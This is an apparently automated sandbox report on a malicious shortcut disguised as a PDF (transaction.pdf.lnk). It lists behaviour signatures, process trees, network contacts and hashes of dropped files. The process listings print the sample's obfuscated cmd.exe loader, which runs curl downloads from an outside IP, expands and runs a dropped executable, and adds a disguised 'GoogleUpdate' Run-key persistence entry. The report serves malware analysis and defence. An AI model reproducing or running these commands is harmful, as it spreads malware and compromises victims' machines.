Malware Analysis Report

2025-06-16 00:41

Sample ID 241110-1z52cswejj
Target transaction.pdf.lnk
SHA256 d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb
Tags
execution persistence
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

d1dcb2be1a582a5bc503bac9b906f54a4fa7fd2d17b0fa5156b936c7f8acc7bb

Threat Level: Likely malicious

The file transaction.pdf.lnk was found to be: Likely malicious.

Malicious Activity Summary

execution persistence

Blocklisted process makes network request

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Adds Run key to start application

Drops file in System32 directory

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Command and Scripting Interpreter: PowerShell

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-10 22:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-10 22:06

Reported

2024-11-10 22:09

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

Signatures

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/VORHPBAB/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""

C:\Windows\System32\cscript.exe

cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

MD5 88c7a65cabaeae2e10cbc7bd5608b28b
SHA1 d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512 b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

C:\Users\Admin\AppData\Local\Temp\bat2.bat

MD5 8fa76d0dea5819256a19064f1639b35c
SHA1 8dd913107ed46e6df0babd1996c67a65909592b9
SHA256 b54a02a81debd9191d15efa77bb915b298f4e7ba1e12638e8fa7280dc8e5b16a
SHA512 468fb2dbf989657d9f0d1e39bb0a6213b5021b255c415a53bded8bc240eb49ae261e11c9904b481476dd9cc5f86e69338afd4fd953b46fb3bd294655d3533b48

memory/2964-46-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

memory/2964-47-0x0000000002760000-0x0000000002768000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-10 22:06

Reported

2024-11-10 22:09

Platform

win10v2004-20241007-en

Max time kernel

143s

Max time network

151s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\system32\cscript.exe N/A
N/A N/A C:\Windows\system32\cscript.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\System32\cscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\System32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\GoogleUpdate = "wscript.exe C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Users\\Admin\\AppData\\Roaming\\Adobe\\merge.ps1 KBKWGEBK" C:\Windows\System32\reg.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4916 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4916 wrote to memory of 4388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\cmd.exe
PID 4388 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cscript.exe
PID 4388 wrote to memory of 4616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\cscript.exe
PID 4616 wrote to memory of 3160 N/A C:\Windows\System32\cscript.exe C:\Windows\System32\cmd.exe
PID 4616 wrote to memory of 3160 N/A C:\Windows\System32\cscript.exe C:\Windows\System32\cmd.exe
PID 3160 wrote to memory of 5096 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 5096 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 1748 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\curl.exe
PID 3160 wrote to memory of 2192 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 2192 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3160 wrote to memory of 4088 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
PID 3160 wrote to memory of 4088 N/A C:\Windows\System32\cmd.exe C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe
PID 4088 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe C:\Windows\System32\wscript.exe
PID 4088 wrote to memory of 2772 N/A C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe C:\Windows\System32\wscript.exe
PID 2772 wrote to memory of 4264 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 2772 wrote to memory of 4264 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 4264 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\wscript.exe
PID 4264 wrote to memory of 3248 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\wscript.exe
PID 3248 wrote to memory of 4932 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 3248 wrote to memory of 4932 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 4932 wrote to memory of 4816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4932 wrote to memory of 4816 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4816 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cscript.exe
PID 4816 wrote to memory of 2376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cscript.exe
PID 4264 wrote to memory of 3616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\wscript.exe
PID 4264 wrote to memory of 3616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\wscript.exe
PID 3616 wrote to memory of 2328 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 3616 wrote to memory of 2328 N/A C:\Windows\System32\wscript.exe C:\Windows\System32\cmd.exe
PID 2328 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe
PID 2328 wrote to memory of 4500 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\reg.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\transaction.pdf.lnk

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /v /c "set "JWU1=e"&&set "RnK2=n"&&set "nKM3=c"&&set "fHp4=r"&&set "uwq5=y"&&set "IIX6=p"&&set "Pfo7=t"&&set "Umz8=i"&&set "FwH9=o"&&set "Nix10=n"&&set "unu11=k"&&set "Mbr12=e"&&set "mNc13=y"&@echo off & (for %t in ("@!Mbr12!!nKM3!h!FwH9! !FwH9!ff" "!nKM3!u!fHp4!l -!FwH9! C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g h!Pfo7!!Pfo7!!IIX6!s://d!fHp4!!Umz8!v!Mbr12!.f!Umz8!l!Mbr12!!Umz8!!FwH9!.!nKM3!!Mbr12!!Nix10!!Pfo7!!Mbr12!!fHp4!/bas!Mbr12!1.j!IIX6!g" "C:\Users\Admin\AppData\Local\Temp\!Pfo7!!Mbr12!s!Pfo7!.j!IIX6!g" "!nKM3!u!fHp4!l -L -!FwH9! C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6! h!Pfo7!!Pfo7!!IIX6!://170.75.168.151/KBKWGEBK/aaa" "!IIX6!!FwH9!w!Mbr12!!fHp4!sh!Mbr12!ll -C!FwH9!mma!Nix10!d Ex!IIX6!a!Nix10!d-A!fHp4!!nKM3!h!Umz8!v!Mbr12! -Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp\bas!Mbr12!.z!Umz8!!IIX6!' -D!Mbr12!s!Pfo7!!Umz8!!Nix10!a!Pfo7!!Umz8!!FwH9!!Nix10!Pa!Pfo7!h 'C:\Users\Admin\AppData\Local\Temp' -F!FwH9!!fHp4!!nKM3!!Mbr12!" "s!Pfo7!a!fHp4!!Pfo7! C:\Users\Admin\AppData\Local\Temp\A!IIX6!!IIX6!l!Umz8!!nKM3!a!Pfo7!!Umz8!!FwH9!!Nix10!F!fHp4!am!Mbr12!H!FwH9!s!Pfo7!.!Mbr12!x!Mbr12!") do echo %~t) > "C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7!" && !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\a.!Pfo7!x!Pfo7! ba!Pfo7!2.ba!Pfo7! & !Mbr12!!nKM3!h!FwH9! S!Mbr12!!Pfo7! !FwH9!bjSh!Mbr12!ll = C!fHp4!!Mbr12!a!Pfo7!!Mbr12!Obj!Mbr12!!nKM3!!Pfo7!("WS!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7!.Sh!Mbr12!ll") : !FwH9!bjSh!Mbr12!ll.Ru!Nix10! "!nKM3!md.!Mbr12!x!Mbr12! /c C:\Users\Admin\AppData\Local\Temp\ba!Pfo7!2.ba!Pfo7!", 0, False > "C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7!" & !fHp4!!Mbr12!!Nix10! C:\Users\Admin\AppData\Local\Temp\b.!Pfo7!x!Pfo7! !fHp4!u!Nix10!_ba!Pfo7!.vbs & s!Pfo7!a!fHp4!!Pfo7! "" !nKM3!s!nKM3!!fHp4!!Umz8!!IIX6!!Pfo7! //!Nix10!!FwH9!l!FwH9!g!FwH9! "C:\Users\Admin\AppData\Local\Temp\!fHp4!u!Nix10!_ba!Pfo7!.vbs""

C:\Windows\System32\cscript.exe

cscript //nologo "C:\Users\Admin\AppData\Local\Temp\run_bat.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\bat2.bat

C:\Windows\System32\curl.exe

curl -o C:\Users\Admin\AppData\Local\Temp\test.jpg https://drive.fileio.center/base1.jpg

C:\Windows\System32\curl.exe

curl -L -o C:\Users\Admin\AppData\Local\Temp\base.zip http://170.75.168.151/KBKWGEBK/aaa

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\base.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp' -Force

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

C:\Windows\System32\wscript.exe

wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" powershell.exe -NoProfile -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1" KBKWGEBK & wscript.exe "C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs" reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK & wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK

C:\Windows\system32\cscript.exe

"C:\Windows\system32\cscript.exe" //nologo "C:\Users\Admin\AppData\Local\Microsoft\hello.js" KBKWGEBK

C:\Windows\System32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

C:\Windows\System32\reg.exe

reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1 KBKWGEBK" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 drive.fileio.center udp
US 172.67.201.111:443 drive.fileio.center tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 111.201.67.172.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
CA 170.75.168.151:80 170.75.168.151 tcp
US 8.8.8.8:53 151.168.75.170.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
RO 65.38.121.211:80 65.38.121.211 tcp
US 8.8.8.8:53 211.121.38.65.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
RO 65.38.121.211:80 65.38.121.211 tcp

Files

C:\Users\Admin\AppData\Local\Temp\run_bat.vbs

MD5 88c7a65cabaeae2e10cbc7bd5608b28b
SHA1 d6ee96710a99d0f65a867c6082148ae7a4981227
SHA256 250bba449b1002c473327e0f2450753fe07f42ad4ffac8a8dc2f367cb416b543
SHA512 b78af497df0dc713822859cb72c58415c0974c43bdd2bad4d4ebdcfc307bbf1f4178452bb7816e28b1a5b3b3f5152a0fbafcd6dc4568d99e9e3fc20ff28a3340

C:\Users\Admin\AppData\Local\Temp\bat2.bat

MD5 aa350b1db128975bd16e8c2c7c4df7f1
SHA1 7be6d97138179f8676740a4e0cbb660736183397
SHA256 69d90278d0a0a757b0cc5fc04459d508edbd7e4a8eba6ae66a5fe84ca12af017
SHA512 65e523b8a29ac68fd9b2e3afe8825b7506335050769cd39dffb1deb11454b67515fa3cd0a96eb54016540dd2e0dbed87dbbfb6f4ed1f283289f04168108571f6

memory/2192-9-0x000002600D140000-0x000002600D162000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y2f4cjrn.dvj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2192-19-0x0000026027C10000-0x0000026027C22000-memory.dmp

memory/2192-20-0x00000260256C0000-0x00000260256CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\base.zip

MD5 367a5951e81795113b8564546a8346c5
SHA1 f5dede6905ce2f0ca23a8f29052c6cbfc66da404
SHA256 4cf4e56b88e42327d3e0dfc48b99c05058df7f46d03dd08ed3295bb6b932ea77
SHA512 061a0d8e9f3f06d036237091f06c92794156ca253004b82b4ecaa89d48052ae120ea9134fd3532911997e4c038ab7a932fc601d75ea86a7309fb0e255e13f488

C:\Users\Admin\AppData\Local\Temp\ApplicationFrameHost.exe

MD5 db2fefe19f85e618f62686cf453df33c
SHA1 9a37897fb3e75074d451c87e5b3dd602545648a6
SHA256 67077124e4a881dba9e4c6e65c8bb45d5ab14a429959f935f933f5824596e463
SHA512 e4fb7dadd3ee954c0b46a95521a42cc076f77d75e9f3ce0ab68713a096b7a45b145723c27bb7d420c5cd5489d69867dc31175135a7efe397deab7bec43eab9c2

C:\Users\Admin\AppData\Local\Temp\dxgi.dll

MD5 83ce934c9273a1daf846ccd0186e1497
SHA1 4439cd1642e8af4f4b6f709bd69ea6afabb62d80
SHA256 bff92ebb960e6b5de169fe56e6ebd3862f7b0563ab38687c51d0e09d1bffc819
SHA512 c2a6e76f8ce3e6d6378a4becf59b441eeec3b0e4d18e20153a61d6757f10d33425801a3b899527e142bc53307cab26d56fcb0a8472485430e5802dbc7faeec0f

C:\Users\Admin\AppData\Roaming\Adobe\run_all.vbs

MD5 66837cd467d2e7fb879f7f8a8a7c32c9
SHA1 70367364b2a4ccf95dc39edb3df96cb0bddbce5b
SHA256 7904f5905e21ddb8ee0bcaa03e009683b0e5995d7b3b64a5d8fac3cea434eaf5
SHA512 8ed864277d19143bd9f073f56eff6720d882cdf7022e1ff996f17d4cb256ed59fee13fd0fe6bdce6c0a26bd45a322142d38fc473d3a6456bc9c211f709baf05a

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 fe3aab3ae544a134b68e881b82b70169
SHA1 926e9b4e527ae1bd9b3b25726e1f59d5a34d36a6
SHA256 bda499e3f69d8fe0227e734bbb935dc5bf0050d37adf03bc41356dfcb5bcca0b
SHA512 3fbd3499d98280b6c79c67b0ee183b27692dbc31acf103b4f8ca4dcdf392afff2b3aad500037f4288581ed37e85f45c3bbb5dcde11cddf3ef0609f44b2ecb280

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 c0e79e67a9a209d37c9e3a9dd6437ab0
SHA1 ce94d8bb54f007e7536727606f8120688da83cd4
SHA256 7f07c943fdbd9ac658066c962b71b3d1f6f8b5d010b1c776c3eea7f3f737e0b0
SHA512 0fff8b276c0efb570e0bcc414c376a27efa2edefab1a0afb7e470a73fd4c47b57846454c145105f935d9e12b4fa50d297e54ea29b09010ccb3ed9d7d1148269d

C:\Users\Admin\AppData\Roaming\Adobe\merge.ps1

MD5 f230b7afc89267a9766f3406cb5dbddf
SHA1 06797eb37d26eb18757db1daff2d381ab25566ab
SHA256 aa27582360eb94b77b942235e6fd1ea5d98fa73f447b8bdba818fcf5a40d09a4
SHA512 c2cc1ecd7a70d73fd6f6471a7bf6e45dd11b0698d6beaf65922550489f40233de1a5ddd2a572dff2eb17a1b767ac53f105f0e2e6bad26ccc8193973e914a949a

C:\Users\Admin\AppData\Local\Microsoft\text1

MD5 2c4ffae6bfebb1ee0035e1400034265d
SHA1 1f93c5cb3953f4a5927ab97eb1618f2c08c448a1
SHA256 2fb855f25db72aebe25885ddd1c983b8769944ede510cc658c7d1c6bdd5787c3
SHA512 860b4c29d06df1f07258f2b9ae7be5c9830d1bd7aa7ab827c823a6bc961739b6c358b8d5f1efe1b0df00eb398192a2f7495e14b19deafb535450ed72d1472aae

C:\Users\Admin\AppData\Local\Microsoft\text2

MD5 fc8b6f161d4f96d3d299400aa78914b7
SHA1 dbe374b617e289f945608254583fc405489f68a5
SHA256 bc995c4123c50cd55c83bf1d17815740aea9930863f82eb62936cc598769e46f
SHA512 00b76152598a52ec391484969828084ead6f56092c26b47d583b10618caffc930e52b9ea48d9c631cd733f85acad32434434b985719f09580f2eb87731198c9c

C:\Users\Admin\AppData\Local\Microsoft\text3

MD5 4c5b654dd985cb1757a4aa84545dc994
SHA1 0266eecac74bbb118780201100bcb8ec8aceef3c
SHA256 7639b5d13dcb7090099326b883095771a63cfb7ff0315dbd78ba6060e4ff7e99
SHA512 93615577bbccfc5d5328b016dfc5437bdbe19b354b245f760ded06b4165819ab8702de3876ae34b2d21376bdeab92ba6b74632c8a27038be06205417c068ecc0

C:\Users\Admin\AppData\Local\Microsoft\hello.js

MD5 d3764fea6416c62582aae6f79759c2be
SHA1 ffba6fe6ae16d9f1c191d462463a5aeec79eb5c7
SHA256 0528254a5933622320e8a3aafdcf4d6e0c3a5b49bac2ff49a7c8b61ecd51b3b0
SHA512 0da696218c879cda5917e3c81e050b62c83c0611d7825df36c3f971e4da63ecdfc66cc76338c00dbeec6de6c675004eaf2e9a7521580f932cbbc2838de2ceeac

memory/4088-57-0x00007FFCD3B50000-0x00007FFCD3C8D000-memory.dmp